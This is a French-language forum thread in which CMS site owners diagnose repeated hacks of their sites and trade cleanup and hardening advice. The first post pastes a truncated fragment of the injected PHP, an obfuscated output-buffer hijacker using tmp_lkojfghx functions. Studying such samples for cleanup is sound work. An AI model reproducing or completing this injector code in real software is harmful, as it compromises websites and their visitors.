[Résolu] Problème de piratage du CMS

[dede]

Bonjour, quand jessaye d'accèder à mon site j'ai ce code d'erreur....

Parse error: syntax error, unexpected T_VARIABLE in /home/intersth/public_html/cms/lib/module.functions.php on line 1

Je vais voir sur le serveur le fichier module.functions.ph et je le compare à un ancien backup d'une semaine et je me rend compte qu'à la ligne 1, le code n'est vraiment pas pareille.


Voici le début du code de la version du serveur (qui cause problème) :

#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('##','',$s);if(stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<?php

Et voici la version du backup....

<?php


Quelqu'un peut me dire pourquoi tout ce code inutile ?

J'ai beau deleter le code inutile pour au moin mettre le site en marche mais après quelques jours le code revient....
je me rend compte que les fichiers qui sont plein de code étrange à la ligne 1 et qui cause problème ont tous été modifier en même temps et c'est dans un temps que moi je n'était pas après mettre le site à jour... et je suis la seule à avoir accès au panneau d'admin. J'ai changer de mot de passe au cas mais le problème est revenu...


J'ai le CMS 5.1.2 et Version du client MySQL: 4.1.22



Merci de votre support.

[groupewibi]

Salut...

Moi j'ai le même.
J'ai fait quelques recherches et apparement, il ne change pas que ces fichiers.
Chez moi le fichier admin/index.php à également été modifié pour charger à l'ouverture un trojan du nom de : trojanclicker.iframe.nag.trojan.

Il y a la même erreur à l'ouverture du site :
Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';' in C:\Inetpub\vhosts\powergas.com\httpdocs\index.php on line 75

Et effectivement, le script index contient ce fichier. ATTENTION, ce fichier est détecté chez moi comme un virus, donc pas possible pour moi de l'éditer.

Plus sérieusement, perso, j'ai 6 sites qui se sont fait craquer comme celà Vendredi et Samedi.
pour savoir quand exactement celà à été fait, tu peux consulter les dates de changement sur ton FTP.

Je pense que c'est également un script automatique qui n'attaquerais que les sites CMSMS (je vais me faire des amis!!).
J'ai rien dit avant, parceque certain de mes sites sont sur une version antérieure à l'actuelle, et comme beaucoup se sont fait gentillement ... quand ils avaient des versions antérieures avec les même pbs de hack, ont leur a conseillé de mettre à jour leur version.

Apparement, toi tu la fait, et je l'ai fait ce WE. Bilan, toujours pareil. Non seulement, j'ai mis à jour, mais je me suis fait hacké directement après, avec la version 1.5.3.

Perso, moi je trouve celà assez sérieux. Si il y a une faille de sécu, c'est bizarre qu'elle n'a pas été détectée avant. Et apparement, une faille qui marche sur les versions antérieures, mais également sur les versions actuelles 1.5.2, 1.5.3.

Pour la réparation. J'appelerais plus celà du bricolage, mais bon => j'ai remplacé les fichiers index corrompu par les backup que j'avais ou version de base des index. Pour l'heure, j'ai pas fait une recherche approfondie sur les répertoires et fichiers concernés par ce virus, mais en changeant les deux index, ça a l'air de marcher. En tous cas sur un de mes sites.. les deux autres se sont fait re-hacké en moins de 12h.

Je cherche actuellement sur les Forum CMSMS pour en savoir un peu plus, sans vouloir lancer une polémique ou un cri d'alerte.
Si on est deux dans ce cas, avec le même hack, sur le même jour, il doit en avoir d'autres.

[jce76350]

re,

un script automatique qui n'attaquerais que les sites CMSMS

Pour le moment c'est sur tes " 6 sites qui se sont fait craquer", mais comme tu le dis toi même :

J'ai rien dit avant, parceque certain de mes sites sont sur une version antérieure à l'actuelle

si tu fais une recherche sur gogle avec "if(!function_exists('tmp_lkojfghx')"
Tu verras que ce n'est pas Que sur CMSMS, mais .... sur un paquet de cms et blog

@ groupewibi et  @dede
Quelles étaient les mesures de sécurité de base des serveurs
- CHMOD des dossiers /admin /lib ?
- CHMOD du config.php
- protection par htacesss du config.php du dossier /plugins /temp /uploads
- hebergeurs ?

[groupewibi]

=> @jce76350
Merci pour la réponse.
Et crois moi que je suis plutôt soulagé de savoir que c'est pas qu'avec CMSMS. OUF !.

Pour les réponses, je me suis jamais préocupé plus que celà (jusqu'a maintenant) du hack de site.
J'ai suivi le développement et la vie de plus de 200 sites web (10 ans de métiers) et je n'avais jamais eut de sites hackés.

J'ai déjà pris celà comme une attaque personnelle (une boite qui me voudra du mal) et en cherchant un peu, c'est vrai que j'ai trouvé des références similaires sur les forums.

Pour ce qui est des autorisations que j'avais :

- CHMOD des dossiers /admin /lib ?  => 705
- CHMOD du config.php => 604 .. je l'ai passé en 444
- protection par htacesss du config.php du dossier /plugins /temp /uploads  => 705
- hebergeurs ? => principalement OVH (4 d'entres eux en offre basiques mais gérés par le client)

je continue pour l'heure de réparer, mais celà recommence à intervales régulier pour ma part.

[jce76350]

re,

J'ai déjà pris celà comme une attaque personnelle

je ne pense pas vu le nombres d'attaques, mais plutot a des "bricoleurs" qui ont trouvé une faille serveur

je continue pour l'heure de réparer, mais celà recommence à intervales régulier pour ma part.

Que disent les logs ?
Blinder les dossiers avec des .htaccess si possible et utiliser le renommage de /admin comme indiqué sur le wiki

[groupewibi]

Je vais essayer celà en effet. Changer l'admin et voir qu'est-ce que je peux avoir accès dans les interface d'admin pour mettre à jour les fichier .ini et vérifier les htaccess du site.

Que du bon temps en perspective.
Je te remercie d'avoir pris le temps de la réponse.

Néamoins, à t-on qq part un feedback sur la correction de se type de hack ?
J'ai cru comprendre un peu que selon toi, celà serait en priorité du à des failles au niveau Serveur et non au niveau du dev ?

Est-ce à identifier comme une faille (encore faut-il savoir par ou ça passe ) ou est-ce qui faut prendre celà comme une faille serveur due à une mauvaise optimimisation des paramètres de sécurité du site ?

[jce76350]

re,

J'ai cru comprendre un peu que selon toi, celà serait en priorité du à des failles au niveau Serveur et non au niveau du dev ?

je pense que cela n'est surment pas du a une faille du code de cmsms sinon il y a aurait plusieurs attaques
Donc je "suppose" que cela vient du "Serveur" c'est à dire de l'hebergement de l'utilisateur.
Il faut dépouiller les logs serveurs et voir comment les autres attaques on été résolues
Bref dans un cas comme celui la ce n'est pas évident de savoir , mais il faut préviligier la sécurité comme indiqué ici (OVH)

[groupewibi]

Super génial.
Merci pour la référence et pour ta réponse. 

Je vais faire de mon mieux pour sécuriser un peu mieux tout celà.
J'espère que cet exemple servira de référence pour mes futurs sites.

Je constate néamoins que la sécurité est à prendre un peu plus au sérieux, et que y'a un peu plus de temps à y accorder si l'on veux éviter ce genre de desagréement.

Merci à toi.

[groupewibi]

Mes sites viennent encore de se faire attaquer malgrès les modifications faites dans le .htaccess
Les fichiers consernés sont de type index.php, login.php, home.php ...

Je cherche.

[Pierre M.]

Bonjour,

Et quand je regarde sur internet, ukservers.com c'est un fournisseur web au UK.... et moi j'ai un serveur dédié à Montréal !
On n'est loin un peu du UK !

On semble aussi très loin d'un problème spécifique à CMSms. Pour en avoir le coeur net, essayer d'héberger une page statique.html et contactez votre fournisseur si registrar, DNS et webserver ne fonctionnent pas correctement.

Pierre M.

[Solutic]

Question peut être bête, mais avez-vous aussi regardé au niveau de vos bases de données, pour voir si par hasard elles n'avaient pas elles aussi été contaminée?

Avez-vous fait le tour des fichiers JS qui sont appelés depuis votre page pour voir si par hasard certains ne seraient pas source d'une faille XSS?

[jce76350]

re

Je viens de me faire attaquer encore..

Certains fichiers sont corompus

Est-ce que c'est possible de réinstaller une vieille version

- faire une sav de la base et la passer à la loupe, si Ok la laisser
- Vider completement l'hebergement
- remmettre les fichiers de la 1.5.3
- refaire une installation Et en Installation Etape 5 ->Décochez "Création des tables" si vous utilisez une base de données existante avec du contenu que vous ne voulez pas effacer

[jce76350]

re,

J'ai installer la version 1.5.3 sur un autre serveur

chez le même hébergeur ?

Tout fonctionne parfaitement et là MAGIE !..... je vais manger et 1h après..

je pense (a mon avis) que tu as un problème dhébergement- fait un test sur une hébergement gratuit pour voir si la malédiction existe.

Je crois que l'aventure du CMS c'est fini pour moi !

Par contre ce n'est surement pas un problème de CMSMS parce que vu le nombres de sites réalisés, s'il y avait une faille cela se saurait.

[bess]

je pense que tu as affaire à un soucis sur ton serveur et non sur CMSMS car comme l'a dit jce76350 tu n'es pas le seul à l'utiliser mais vous n'êtes que 2 à vous faire pirater.

Question : avez vous une application tierce présente sur le FTP ? (phpmyadmin, ftp2web, forum phpbb, ...)

si telle est le cas testez sur un hébergement vidé de tout autre appli afin d'écarter la possible faille d'une autre appli qui toucherais tout l'hébergement.

Contactez également l'hébergeur pour lui demander un coup de main, OVH à par exemple la possibilité de tracer certaines activité louche, ca donnera peut être des pistes

[mamad]

Je viens de me faire attaquer encore....  Et la c'est pire qu'avant que je mette des .htaccess  ! Les fichiers .js ont aussi été touché, ce qui n'était pas le cas  dans les attaque précédentes.

Est-ce que c'est possible de réinstaller une vieille version ? Je n'avais aucun problèmes de ce genre avec la version black rock ou quelque chose du genre. Je ne me souviens plus c'était quelle version mais je me souviens que ce genre de problème ne m'arrivait jamais !

Bonjour,
Moi aussi j'ai le même problème par contre la différence que j'ai remarqué c'est que
j'ai plusieurs site sur le même serveur ,que les sites que j'ai les accees  enregistrés sur mon poste pour le ftp qui sont infectés
pouvez vous nous aider ça touche notre production